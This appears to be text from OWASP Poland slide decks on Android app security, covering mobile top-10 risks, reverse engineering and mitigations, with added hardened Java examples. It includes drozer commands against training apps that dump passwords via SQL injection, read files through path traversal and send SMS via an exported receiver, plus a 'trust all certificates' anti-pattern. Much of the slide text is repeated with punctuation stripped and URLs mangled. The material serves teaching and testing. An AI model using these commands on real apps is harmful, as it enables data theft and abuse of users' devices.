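    @Override public Uri insert(Uri uri, ContentValues v) { throw new UnsupportedOperationException("read-only"); }
    @Override public int update(Uri uri, ContentValues v, String s, String[] a) { throw new UnsupportedOperationException("read-only"); }
    @Override public int delete(Uri uri, String s, String[] a) { throw new UnsupportedOperationException("read-only"); }
    @Override public String getType(Uri uri) { return "vnd.android.cursor.dir/vnd.example.passwords"; }
}
```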
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug, etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send an intent and enjoy
Broadcast receivers attacks
  <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
          <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
  </receiver>
  …
  <uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
  public void onReceive(Context arg0, Intent arg1) {
      context = arg0;
      SmsManager sms = SmsManager.getDefault();
      Bundle bundle = arg1.getExtras();
      sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
      Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
  }
Broadcast receivers attacks
  dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all the above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the component)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
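The SendSMSNowReceiver pattern with the two defences from this slide applied, plus validation of the extras, as an added example that is not GoatDroid's code; the permission name, the action string, the class name and the approved-recipient store are assumptions.

```java
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.telephony.SmsManager;
import android.util.Log;
import java.util.Collections;
import java.util.Set;

// Added example (not GoatDroid's code). The matching manifest entry, also
// assumed, would be:
//
//   <permission android:name="com.example.app.permission.SOCIAL_SMS"
//               android:protectionLevel="signature" />
//   <receiver android:name=".SocialSmsReceiver"
//             android:exported="false"
//             android:permission="com.example.app.permission.SOCIAL_SMS">
//       <intent-filter>
//           <action android:name="com.example.app.SOCIAL_SMS" />
//       </intent-filter>
//   </receiver>
//
// exported="false" keeps other UIDs from reaching the receiver at all; the
// signature-level permission is defence in depth for the case where the
// receiver must stay exported for a companion app signed with the same key.
public class SocialSmsReceiver extends BroadcastReceiver {
    public static final String ACTION_SOCIAL_SMS = "com.example.app.SOCIAL_SMS";
    private static final String TAG = "SocialSmsReceiver";
    private static final int MAX_MESSAGE_LEN = 160;

    @Override
    public void onReceive(Context context, Intent intent) {
        // An intent reaching this method proves nothing about its sender, so the
        // action and every extra are checked before anything is sent.
        if (intent == null || !ACTION_SOCIAL_SMS.equals(intent.getAction())) return;
        String number = intent.getStringExtra("phoneNumber");
        String message = intent.getStringExtra("message");
        if (!isValidNumber(number) || !isValidMessage(message)) {
            Log.w(TAG, "rejected SOCIAL_SMS with malformed extras");
            return;
        }
        // Only recipients the user already approved in the app's own UI: this
        // closes the "send PWNED to 1234567890" case even if the receiver were reachable.
        if (!isApprovedRecipient(context, number)) {
            Log.w(TAG, "rejected SOCIAL_SMS to unapproved recipient");
            return;
        }
        SmsManager.getDefault().sendTextMessage(number, null, message, null, null);
    }

    // Digits with an optional leading '+', bounded length: no control
    // characters, no oversized strings.
    static boolean isValidNumber(String n) {
        return n != null && n.matches("\\+?[0-9]{3,15}");
    }

    static boolean isValidMessage(String m) {
        return m != null && !m.isEmpty() && m.length() <= MAX_MESSAGE_LEN;
    }

    // Assumed app-specific store: an approved-recipient set kept in the app's
    // private SharedPreferences (MODE_PRIVATE, so other apps cannot edit it).
    private static boolean isApprovedRecipient(Context context, String number) {
        Set<String> approved = context.getSharedPreferences("recipients", Context.MODE_PRIVATE)
                .getStringSet("approved", Collections.<String>emptySet());
        return approved.contains(number);
    }
}
```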
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5
• https://manifestsecurity.com/android-application-security-part-8
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing the application
• Analyze the package files at different stages:
  adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it does so incorrectly
What do you mean, „incorrectly”?
• Insecure implementations are:
  – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a „chain of trust”
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in the source code: the expected X.509 certificate or public key
  if (presented_cert == pinned_cert)
      start_connection()
  else
      drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
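The pinning pseudocode from the theory slide written as a real X509TrustManager, next to the "trust all certificates" pattern the Hannover study found, as an added example that is not from the slides or the paper; the host name, the pin values and the use of java.util.Base64 (android.util.Base64 on older Android) are assumptions.

```java
import java.net.URL;
import java.security.KeyStore;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.Arrays;
import java.util.Base64;
import java.util.List;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;
import javax.net.ssl.X509TrustManager;

// Added example (not from the slides). Pins are SHA-256 hashes of the
// SubjectPublicKeyInfo, not of the whole certificate, so a routine re-issue
// with the same key pair does not break the app; keep a backup pin for key
// rotation. The two values below are placeholders.
public final class PinnedTrust {
    static final List<String> PINS = Arrays.asList(
            "sha256/PLACEHOLDER_PRIMARY_SPKI_HASH_BASE64",
            "sha256/PLACEHOLDER_BACKUP_SPKI_HASH_BASE64");

    static String spkiPin(X509Certificate cert) throws CertificateException {
        try {
            byte[] digest = MessageDigest.getInstance("SHA-256")
                    .digest(cert.getPublicKey().getEncoded());
            return "sha256/" + Base64.getEncoder().encodeToString(digest);
        } catch (NoSuchAlgorithmException e) {
            throw new CertificateException(e);
        }
    }

    // Correct: the platform validates the chain of trust first, then a pinned
    // key must additionally appear somewhere in the validated chain.
    static final class PinningTrustManager implements X509TrustManager {
        private final X509TrustManager platform;

        PinningTrustManager() throws Exception {
            TrustManagerFactory tmf = TrustManagerFactory.getInstance(
                    TrustManagerFactory.getDefaultAlgorithm());
            tmf.init((KeyStore) null);                    // default system CA store
            platform = (X509TrustManager) tmf.getTrustManagers()[0];
        }

        @Override
        public void checkServerTrusted(X509Certificate[] chain, String authType)
                throws CertificateException {
            platform.checkServerTrusted(chain, authType); // chain of trust
            for (X509Certificate cert : chain) {
                if (PINS.contains(spkiPin(cert))) return; // presented == pinned
            }
            throw new CertificateException("no pinned public key in chain"); // drop
        }

        @Override
        public void checkClientTrusted(X509Certificate[] chain, String authType)
                throws CertificateException {
            platform.checkClientTrusted(chain, authType);
        }

        @Override
        public X509Certificate[] getAcceptedIssuers() { return platform.getAcceptedIssuers(); }
    }

    // Wrong (the "trust all certificates" finding): empty checks accept any
    // certificate, including one an interception proxy forges on the fly.
    static final class TrustAllManager implements X509TrustManager {
        @Override public void checkServerTrusted(X509Certificate[] c, String a) { }
        @Override public void checkClientTrusted(X509Certificate[] c, String a) { }
        @Override public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; }
    }

    public static HttpsURLConnection open(String url) throws Exception {
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, new TrustManager[] { new PinningTrustManager() }, null);
        HttpsURLConnection conn = (HttpsURLConnection) new URL(url).openConnection();
        conn.setSSLSocketFactory(ctx.getSocketFactory());
        // The default HostnameVerifier stays in place: "accept all hostnames"
        // was the study's other finding.
        return conn;
    }
}
```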
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the passwords to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the „smdm” prefix allows for remote installation of ANY application while the user thinks he is installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute „exported=false”, another application can define the same filter and the system displays a dialog so the user can pick which app to use
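An Activity that is reachable through a VIEW intent-filter but validates the incoming URI before acting on it and uses an explicit Intent for the internal hop, as an added example that is not from the slides or the KNOX write-up; the scheme, the host allow-list and the class names are assumptions.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

// Added example (not from the slides). Incoming data is treated as untrusted
// input; only an explicit Intent carries the parsed result further.
public class DeepLinkActivity extends Activity {
    private static final String EXPECTED_SCHEME = "https";                   // assumed
    private static final Set<String> ALLOWED_HOSTS =                         // assumed
            new HashSet<>(Arrays.asList("app.example.com", "www.example.com"));

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Uri data = getIntent().getData();
        if (!isTrustedUri(data)) {
            // Custom schemes, attacker-chosen hosts or file paths are dropped here;
            // nothing is installed, loaded or downloaded on the strength of the URI.
            finish();
            return;
        }
        // Explicit Intent (package + class fixed): no other app's matching
        // intent-filter can receive the data, and no chooser dialog appears.
        Intent next = new Intent(this, ContentActivity.class);
        next.putExtra("path", data.getPath());   // hand over the parsed part, not the raw URI
        startActivity(next);
        finish();
    }

    static boolean isTrustedUri(Uri uri) {
        if (uri == null || !EXPECTED_SCHEME.equals(uri.getScheme())) return false;
        if (uri.getUserInfo() != null) return false;          // refuse user@host forms
        String host = uri.getHost();
        return host != null && ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    // Assumed internal target, declared in the manifest with android:exported="false".
    public static class ContentActivity extends Activity { }
}
```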
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers attacks
Sample manifest from GoatDroid:
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
...
<uses-permission android:name="android.permission.SEND_SMS" />
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    // Recipient and text are taken straight from the incoming intent's extras; nothing checks
    // who sent the broadcast, so any app that knows the action can make this app send an SMS.
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
Broadcast receivers attacks
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all the above-mentioned items:
• Setting the android:exported attribute to false (only the current app, i.e. the same user ID, will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
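A hardened counterpart to the GoatDroid receiver, written as an added example for this section (it is not GoatDroid's or drozer's code): the receiver is confined to its own package with a signature-level permission, reacts only to its own action, and validates the extras before anything reaches SmsManager. The package name, action string and permission name are placeholders.

```java
package org.example.hardened; // placeholder package, not GoatDroid's

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.os.Bundle;
import android.telephony.SmsManager;
import android.util.Log;

/**
 * Hardened SMS receiver. Compared with the GoatDroid sample it
 *  (1) is not reachable by arbitrary apps (manifest: android:exported="false", or the runtime
 *      registration below, which additionally demands a signature permission from the sender),
 *  (2) acts only on its own action, and
 *  (3) validates the extras before sending anything.
 * All names below (package, action, permission) are placeholders for this example.
 */
public class GuardedSmsReceiver extends BroadcastReceiver {
    private static final String TAG = "GuardedSmsReceiver";
    public static final String ACTION_SOCIAL_SMS = "org.example.hardened.SOCIAL_SMS";
    // Declare in the manifest with android:protectionLevel="signature" so that only apps
    // signed with the same key can hold it:
    //   <permission android:name="org.example.hardened.permission.SEND_SOCIAL_SMS"
    //               android:protectionLevel="signature" />
    public static final String PERMISSION_SEND_SOCIAL_SMS =
            "org.example.hardened.permission.SEND_SOCIAL_SMS";

    @Override
    public void onReceive(Context context, Intent intent) {
        // Only the one action this receiver was written for; everything else is ignored.
        if (intent == null || !ACTION_SOCIAL_SMS.equals(intent.getAction())) {
            return;
        }
        Bundle extras = intent.getExtras();
        if (extras == null) {
            return;
        }
        String number = extras.getString("phoneNumber");
        String message = extras.getString("message");
        // Both extras must be present and well-formed: a dialable number and a single-SMS text.
        if (number == null || message == null || message.isEmpty()) {
            Log.w(TAG, "dropping broadcast with missing extras");
            return;
        }
        if (!number.matches("\\+?[0-9]{3,15}") || message.length() > 160) {
            Log.w(TAG, "dropping broadcast with malformed number or oversized message");
            return;
        }
        SmsManager.getDefault().sendTextMessage(number, null, message, null, null);
    }

    /**
     * Runtime registration: the third argument is the permission a SENDER must hold for its
     * broadcast to be delivered here, which replaces the open <intent-filter> of the sample.
     */
    public static GuardedSmsReceiver register(Context context) {
        GuardedSmsReceiver receiver = new GuardedSmsReceiver();
        IntentFilter filter = new IntentFilter(ACTION_SOCIAL_SMS);
        context.registerReceiver(receiver, filter, PERMISSION_SEND_SOCIAL_SMS, null);
        return receiver;
    }

    /** Sending side: an explicit, package-scoped broadcast that no other app's receiver can claim. */
    public static void sendExplicit(Context context, String number, String message) {
        Intent intent = new Intent(ACTION_SOCIAL_SMS)
                .setPackage(context.getPackageName())
                .putExtra("phoneNumber", number)
                .putExtra("message", message);
        // Receivers must hold the same permission; our own app does, a third-party app cannot.
        context.sendBroadcast(intent, PERMISSION_SEND_SOCIAL_SMS);
    }
}
```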
References
• httpdeveloperandroidcomguidecomponentsindexhtml
• httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtml
• httpresourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
• httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakage
• httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receivers
• httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdf
• httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbook
• httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdf
• httpsmanifestsecuritycomandroid-application-security-part-5
• httpsmanifestsecuritycomandroid-application-security-part-8
• httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdf
• httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
• httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
